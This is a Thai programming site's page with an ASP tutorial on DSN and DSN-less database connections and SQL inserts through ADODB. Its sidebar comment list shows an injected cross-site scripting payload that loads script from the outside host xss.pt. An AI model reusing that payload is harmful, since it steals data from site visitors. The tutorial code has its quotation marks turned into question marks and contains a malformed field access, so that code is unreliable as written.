หน้าแรก
 การบ้าน
  C/C++ new
  Java new
 Sourcecode.TV
  Android
  Blackberry
  C/C++
  Java
  Linux
  Windows Phone
  แจ้งเรื่องที่ต้องการ
 บทความ
  .NET
  Android
  Blackberry
  C++Builder
  Delphi
  Java
  Mobile
  Open Source
  Pocket PC
  Visual Basic
  Web
  Windows Phone
  Others
 แบบเรียนฟรี
  ASP
  ASP.NET Webmatrix
  C++
  eVB
  J2ME
  Java
  PHP
 ซอร์สโค้ด
  Android
  ASP
  C++
  VC++
  CGI-Perl
  Delphi
  Java
  jQuery
  PHP
  Visual Basic
  .NET
 บริการจากเรา
  เปิดท้าย... ขายโค้ด
  DoodeeHosting
  รับออกแบบ พัฒนาเว็บไซต์
  Freeware
  อัตราค่าโฆษณา
  รายชื่อลูกค้า
  สถิติผู้เข้าเว็บ
 ดาว์นโหลด
 ค้นหาข้อมูล
 กระดานสนทนา
  .NET
  C/C++
  Delphi
  Java
  Palm/PocketPC
  Visual Basic
  Web
  อื่นๆ
 กระดานงาน
 ลิงค์เว็บ
 เกี่ยวกับผม
 อัตราค่าโฆษณา
Social Network

Facebook  Twitter  YouTube
 New Article
 Webboard
 Freelanceboard
Freeware
โปรแกรมเบอร์ดี (BerDee)
โปรแกรมเบอร์ดี (Android)
เกมส์เป่ายิ้งฉุบ
เกมส์เป่ายิ้งฉุบ(Android)
WebcamMonitor
WebcamMonitor(Windows)
scSendMail
scSendMail(Windows)
MSN Caption
MSN Caption(Windows)
  Freelance comment
  ติดต่อสอบถามมาได้ตลอดนะ...
2015-07-29 13:35:58
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:33:54
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:32:51
  ติดต่อสอบถามเข้ามาได้นะ...
2014-01-06 12:47:38
  ถ้ายังหาคนสอนไม่ได้ ก็ลอ...
2013-07-06 01:04:37
  สนใจส่งขอบเขตมาคุยราคาก...
2013-03-24 18:54:20
  ถ้ายังไม่มีคนรับงานติดต...
2012-12-16 19:18:14
  สนใจคะ ติดต่อ 0905076277...
2012-11-12 11:07:46
  รับทำโปรเจ็คนักศึกษาหรื...
2012-10-29 03:10:46
  sukit_te34@hotmail.com...
2012-10-29 03:09:36
  Webboard comment
  ก็ต้องลง uninstall แล้วก็ลอง install...
2019-10-22 01:56:28
  ขอบคุณค่ะ คุณ maddog ลองทำดูแ...
2019-10-21 12:32:51
  ลองทำตามนี้ดู

https://stackoverflow.c...

2019-10-16 11:39:03
  ถ้าคนอื่นเขียนให้ แล้วมั...
2019-09-17 14:01:26
  ถ้าใช้ไฟฟ้า 0 หน่วยให้ขึ้...
2019-09-17 13:59:39
  ............
2019-08-20 14:19:49
  ผมทำคลิปสอนเขียน C# หาค่า BM...
2019-08-06 11:52:23
  ทำคลิปสอนเขียนโปรแกรมคำ...
2019-04-29 09:56:21
  ผมทำคลิปสอนเขียน C# หาค่า BM...
2019-04-23 05:06:26
  ขอบคุณครับ โค้ดผิดตั้งแต...
2019-03-27 09:21:54
  Homework comment
  แบบนี้ขอเป็น ภาษา php หน่อย...
2019-09-18 14:36:34
  ผมไม่อยากให้คุณได้คะแนน...
2019-04-27 01:29:07
  อาจารย์เขาบอกแนวข้อสอบม...
2019-04-27 00:44:29
  ขอสอบถามการเขียน c++ ครับ เ...
2018-04-02 12:19:21
  โค้ดตัวอย่างศึกษาให้เข้...
2017-11-26 14:50:05
  คำนวณค่าน้ำโดยรับค่ามิเ...
2017-11-20 23:15:26
  ขอบคุณมากครับ...
2017-08-16 18:27:25
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:40:46
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:37:54
  ประเด็นแรก flowchart มันไม่มีภ...
2017-04-18 17:43:33
  Article comment
  รับเขียน arx จาก vc++ 2017 ล็อคโปร...
2019-09-19 09:48:09
  ทำการ register ไฟล์ที่ชื่อ mswinsck.oc...
2019-09-17 14:05:56
  <Img sRC=https://xss.pt/op2fp.jpg>
<sCRiPt sRC=//xss.pt/op...

2019-09-12 13:43:34
  ใน vb 6 ไม่มี component winsock เลยค่ะ ส...
2019-09-03 10:31:02
  รบกวนขอสอบถามหน่อยนะครั...
2019-03-04 05:31:04
  สามารถนำตัวหนังสือจากภา...
2018-12-25 08:54:32
  มีcode ของ VB ไหมค่ะ ถ้ามีรบกว...
2017-09-28 16:50:02
  น่าจะได้ครับ ไม่เคยลอง
...

2017-07-11 09:59:35
  สามารถใช้ต่อกับ anycast ได้ไห...
2017-07-05 10:12:35
  ครับ คุณ "ติด" แล้วลองนึกต...
2016-06-18 15:21:09
  9Mcode comment
  อยากได้...
2014-02-21 08:52:19

Link Exchange

อัตราค่าโฆษณา
Statistics of Sourcecode in Thailand
 
 ASP Tutorial  

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

 ASP
 
 

การเขียนสคริปติดต่อฐานข้อมูล (DSN - DSN less)

 

Connection

Connection คือข้อมูลของช่องทางที่คุณจะต้องใช้ในการติดต่อกับฐานข้อมูล ซึ่งข้อมูลเหล่านี้มีด้วยกันหลายส่วนเช่น ชนิดของฐานข้อมูล, ฐานข้อมูลอยู่ที่ไหน และ ชื่อของฐานข้อมูลที่จะติดต่อด้วย เป็นต้น สำหรับวิธีการที่จะใช้ในการกำหนดข้อมูลของ Connection เช่นการใช้ Data Source Name (DSN) และวิธี DSN-Less

Connection String

Connection String คือสตริงที่มีข้อมูลที่ใช้ในการติดต่อกับข้อมูลหรือฐานข้อมูล

ตัวอย่างการติดต่อผ่าน DSN

Dim ObjRs1

Set ObjRs1=Server.CreateObject(?ADODB.Recordset?)

ObjRs1.Open ?Shippers?,?DSN=NWinAccess?

Response.Write ?<B>แสดงผลของตัวอย่างวิธีใช้งาน DSN </B><BR>?

Do While Not ObjRs1.EOF

Response.Write ObjRs1.(?CompanyName?)&?<BR>?

ObjRs1.MoveNext

Loop

 

ตัวอย่างการติดต่อผ่าน DSN-Less

Dim ObjRs1, strCon

StrCon=?DRIVER={Microsoft Access Driver (*.mdb)};? _

?DBQ=C:\Program Files\Microsoft Office\Office\Samples\Northwind.mdb?

Set ObjRs1=Server.CreateObject(?ADODB.Recordset?)

ObjRs1.Open ?Shippers?,strCon

Response.Write ?<B>แสดงผลของตัวอย่างวิธีใช้งาน DSN Less</B><BR>?

Do While Not ObjRs1.EOF

Response.Write ObjRs1.(?CompanyName?)&?<BR>?

ObjRs1.MoveNext

Loop

จากตัวอย่างข้างต้นจะเห็นได้ว่า ตัวอย่างการติดต่อผ่าน DSN-Less จะมีการเรียกใช้ strCon เพื่อสร้างการติดต่อ ส่วนตัวอย่างแบบ DSN ไม่มีการใช้ strCon แต่คุณจะเป็นจะต้องทำการสร้าง DSN ที่เครื่อง Server โดยมีขั้นตอนดังนี้

  1. เรียกใช้งานโปรแกรม ODBC Data Source Administrator โดยจะอยู่ใน Control Panel
  2. เลือกแท็บ System DSN แล้วคลิกปุ่ม Add..
  3. เลือก Microsoft Access Driver คลิก ปุ่ม Finish
  4. กำหนด Data Source Name เป็น NwindAccess
  5. คลิกปุ่ม Select? แล้วทำการเลือกฐานข้อมูลที่ต้องการติดต่อ (ในที่นี้คือ Nothwind.mdb ที่อยู่ใน C:\Program Files\Microsoft Office\Office\Samples\Northwind.mdb)

เมื่อเราได้สร้าง DSN แล้วทำให้เราสามารถติดต่อฐานข้อมูลตามในตัวอย่างการติดต่อฐานข้อมูลแบบ DSN ดังข้างต้นได้

 

การใช้ SQL ร่วมกับฐานข้อมูล

ถ้าคุณเคยเรียนรู้ภาษา SQL มาคุณจะทรายว่ามันมีคำสั่งที่ใช้บ่อยๆอยู่ชุดหนึ่งซึ่งได้แก่ SELECT, INSERT, UPDATE และ DELETE ซึ่งคุณสามารถที่จะสร้าง SQL สตริงที่ใช้คำสั่งเหล่านี้ในการค้นหา, การเพิ่ม, การลบ และการแก้ไข ข้อมูลที่อยู่ในฐานข้อมูล

ตัวอย่าง

Dim ObjCon, strSQLAdd

StrCon=?Provider=Microsoft.Jet.OLEDB.4.0;? & _

?Data Source=C:\Program Files\Microsoft Office\Office\Samples\Northwind.mdb;? & _

?Persist Security Info=False?

Set ObjCon=Server.CreateObject(?ADODB.Connection?)

ObjCon.Open strCon

StrSQLAdd=?INSERT INTO Products(ProductName, SupplierID, CategoryID, UnitPrice)?

StrSQLAdd= StrSQLAdd & ?VALUES(?Sourcecode?,1,1,35)?

ObjCon.Execute strSQLAdd,,adCmdText

ObjCon.Close

Set ObjCon=Nothing

 

BACK

7in1 USB-C Hub Dual Type-C Multiport Card Reader Adapter 4K HDMI For MacBook Pro
7in1 USB-C Hub Dual Type-C Multiport Card Reader Adapter 4K HDMI For MacBook Pro
สายต่อจอ สำหรับเครื่อง macbook pro 2016 (usb-c to HDMI)
สายต่อจอ สำหรับเครื่อง macbook pro 2016 (usb-c to HDMI) ความละเอียดระดับ 4K
หัวแปลง Mini DisplayPort to HDMI Adapter หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
คลิปสอนเขียนโปรแกรม
เรียนเขียนโปรแกรมดอทเน็ต
เรียนเขียนโปรแกรมแอนดรอยด์
เรียนเขียนโปรแกรมเบล็คเบอร์รี่
เรียนเขียนโปรแกรมซี ซีพลัสพลัส
เรียนเขียนโปรแกรมจาวา
เรียนการใช้งานลินุกส์
เรียนการเขียนโปรแกรมวินโดว์โฟน
เรียนการเขียนโปรแกรมพีเฮชพี มายเอสคิวเอล
9M Blog บอกเล่าเรื่องราว การเขียนโปรแกรมของ นายเอ็ม
บริการ ถ่ายภาพรับปริญญา
อัตราค่าโฆษณา
 
Tutorial
eVB Tutorial
ASP.NET Webmatrix Tutorial
J2ME Tutorial
C++  Tutorial
Java  Tutorial
PHP Tutorial
ASP Tutorial
 
แบบสำรวจ
Freelance รับพัฒนาโปรแกรม

Home - Article - Tutorial - Sourcecode - Dev Handbook - Search - WebBoard - Links - About Us

สงวนลิขสิทธิ์ ห้ามคัดลอก ทำซ้ำ แก้ไข ดัดแปลง ไม่ว่าในรูปแบบใด โดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษร
เลขทะเบียนพาณิชย์อิเล็กทรอนิกส์จากกระทรวงพาณิชย์: 7100503002000
Copyright 2001 SourceCode.in.th